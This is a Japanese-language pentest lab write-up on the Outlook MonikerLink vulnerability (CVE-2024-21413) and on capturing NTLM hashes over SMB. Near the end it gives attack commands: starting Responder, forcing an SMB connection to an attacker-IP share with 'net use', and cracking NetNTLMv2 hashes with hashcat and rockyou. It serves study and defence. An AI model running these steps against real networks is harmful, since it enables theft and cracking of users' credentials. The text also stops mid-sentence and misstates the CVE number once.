
脆弱性 CVE 2024-214113 (MONIKER LINK) の PenTest 用に作成されたラボ。
このプロジェクトの目的は、CVE-2024-21413 (MonikerLink) の脆弱性を研究し、SMB/NTLM プロトコルが資格情報の取得に悪用される方法を探ることです。
Microsoft による公式修正後も、このラボでは内部シナリオにおいてコンセプトが依然として有効であることを示しています。
脆弱性 (CVE-2024-21413) は MonikerLink として知られ、重大 (CVSS 9.8) と評価されました。
これは、Outlook が "file://" リンクを安全でない方法で処理し、古い COM API (Moniker Objects) を使用していたために発生しました。これらのオブジェクトにより、Outlook は Protected View を経由せずに外部リソースを呼び出し、クライアントに自動的に SMB 接続を開始させることができました。
これは、特別なリンクを介して COM オブジェクトを参照できる Windows の機能です。
元のエクスプロイトは、電子メールで送信された "file://" リンクや UNC パスを悪用していました。
リンクに "!" 文字を追加することで、Outlook の内部保護を回避し、外部リソースを直接強制的に開くことが可能でした。
これにより自動 NTLM 認証が発生し、ユーザーの大きな操作なしに攻撃者に NetNTLMv2 ハッシュが露出しました。
パッチ KB5002519 は、Outlook におけるこの動作を特にブロックし、"file://" リンクがこのように処理されるのを防ぎます。
ただし、Windows の自動 NTLM は Outlook のコンテキスト外でも引き続き機能します。つまり、NTLM が有効で認証制限がない環境で SMB リソースにアクセスしようとすると、依然として自動的にハッシュが送信される可能性があります。
📌 Outlook、SMB/NTLM、Responder の関係 元のエクスプロイト: 悪意のあるリンクを含むスパムメール → Outlook が処理 → NTLM が自動認証 → 攻撃者がハッシュを受信。
内部ラボ: 概念部分のみをシミュレート → 手動で SMB 接続を強制 → Responder がハッシュをキャプチャ → Hashcat がクラッキングを実行。
なぜまだ機能するのか?NTLM は Outlook に関係なく SMB 接続で自動認証するレガシープロトコルだからです。パッチは Outlook クライアントを修正しますが、Windows 上の NTLM の動作を排除するわけではありません。


テスト中、Outlook は電子メールからの file:// リンクをブロックし、セキュリティ警告を表示しました:

2024年2月にリリースされたパッチ KB5002519 は、file:// リンクをブロックすることで電子メール経由の外部ベクターを緩和します。
ただし、NTLM プロトコルは SMB 接続での自動認証を引き続き許可します。
つまり、Outlook はこの特定のエクスプロイトから保護されていますが、内部攻撃面は依然として有効です。
問題の根源は、認証メカニズムとしての NTLM への依存にあり、SMB 接続でのハッシュキャプチャに対して脆弱なままです。
sudo responder -I eth0

Via Explorer, acessando manualmente:
\\<IP do atacante>\test.

Via terminal (cmd ou PowerShell), usando o comando:
net use \\<IP do atacante>\test

/usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt

hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
注:
実際のパスワードはセキュリティ上の理由から表示されません。目的はプロセスと脆弱性を実証することです。

このラボは以下を明らかにしました: